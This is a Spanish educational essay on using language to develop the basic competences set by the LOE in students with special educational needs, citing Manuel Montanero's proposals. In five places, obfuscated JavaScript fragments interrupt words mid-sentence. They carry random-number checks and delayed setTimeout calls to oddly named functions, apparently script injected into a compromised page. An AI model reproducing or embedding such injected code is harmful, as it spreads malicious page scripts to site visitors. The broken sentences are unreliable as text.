LA LENGUA COMO EJE PARA EL DESARROLLO DE LAS COMPETENCIAS BÁSICAS EN ALUMNOS CON NECESIDADES EDUCATIVAS ESPECIALES

Autora: Francisca Isabel Fernández Rico


          La principal novedad de la Ley Orgánica 2/2006, de 3 de Mayo de Educación (en adelante LOE) es que se han seleccionado ocho competencias básicas que, incorporadas al currículo, permiten poner el acento en aquellos aprendizajes que se consideran imprescindibles, desde un planteamiento integrador y orientado a la aplicación de los saberes adquiridos.


          Las Competencias Básicas son aquellas competencias que debe haber desarrollado un joven al finalizar la enseñanza obligatoria para poder lograr su realización personal, ejercer la ciudadanía activa, incorporarse a la vida adulta de manera satisfactoria y ser capaz de desarrollar un aprendizaje permanente a lo largo de la vida.


          Estas competencias, que hemos considerado como los cimientos sobre los que se construye el edificio de los aprendizajes y el lugar de convergencia de todas las áreas y materias del currículo, las deberán adquirir todos los alumnos, incluidos aquellos que presentan necesidades educativas especiales.


          Manuel Montanero en su ponencia “Competencias Básicas: alternativas al copia y pega” ya propone el desarrollo de las mismas para la completa integración de los jóvenes en la sociedad. Montanero sitúa su enfoque en el marco europeo del informe PISA y propone la lectura, las matemáticas y la resolución de problemas como la base para el desarrollo de las CC.BB.; las cuales, a su vez, se erigen como el asiento para la consecución del resto de habilidades; es decir, la comunicativa, la cultural y la artística, la de aprender a aprender, la de iniciativa personal, o, por ejemplo, la social y ciudadana, la de interacción con el mundo físico, la matemática y, por último, la digital.


          Este autor pone el acento en la combinación de las CC.BB. para interactuar de forma autónoma; en lo individual, de forma asertiva, y en lo social; en todos los contextos, y, para ello, los instrumentos de los que nos valdremos serán tanto el uso de la lengua como de la literatura. Así, adaptamos aquello que queremos expresar a la sociedad empleandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando las nuevas tecnologías de información y de la comunicación en unos casos y en otros la lengua oral, incrementandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando con ello la mejora en el empleo de las TIC.


           De modo que en el aprendizaje a lo largo de la vida será necesario el uso y adquisición de todas las CC.BB.


          La utilización del lenguaje como instrumento comporta poner en marcha estrategias y acciones imprescindibles para la adquisición y desenvolvimiento en el conjunto de las competencias básicas.


          Cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando interactuamos de forma competente a través del lenguaje, contribuimos al desarrollo no sólo de la competencia lingüística sino a la consecución de otras competencias básicas. De este modo, el desarrollo de la competencia en comunicación lingüística se consigue mediante el uso de la lengua en situaciones concretas de comunicación tanto real como virtual. Para ello será imprescindible representar todas las situaciones posibles de comunicación que el alumnado se enfrenta diariamente dentro y fuera del aula.


           El lenguaje es un instrumento para la construcción del conocimiento y un juego simbólico sobre el que es necesario reflexionar. El uso de la lengua supone un medio específico para alcanzar la competencia lingüística y comunicativa, base para la adquisición del resto de CC.BB.


           Gracias al uso de la lengua integramos el conocimiento matemático en otros tipos de conocimientos. Con esta competencia, resolvemos problemas relacionados con la vida diaria y el mundo laboral.


           Por otra parte, con el uso del lenguaje regulamos nuestro comportamiento y pensamiento, de modo que mejoramos la adquisición de la competencia de autonomía e iniciativa personal y la de aprender a aprender.


           Al ser el lenguaje un instrumento de comunicación interactuamos con el mundo físico, tanto en sus aspectos físicos como en los motivados por la acción humana, y con la unión de ambas mejoraremos nuestras condiciones de vida.


           De este modo, con el uso de la lengua nos comunicamos con otras personas, tomandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando con ello conciencia de que formamos parte de la sociedad, con lo que mejoramos la competencia social y ciudadana, aportandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}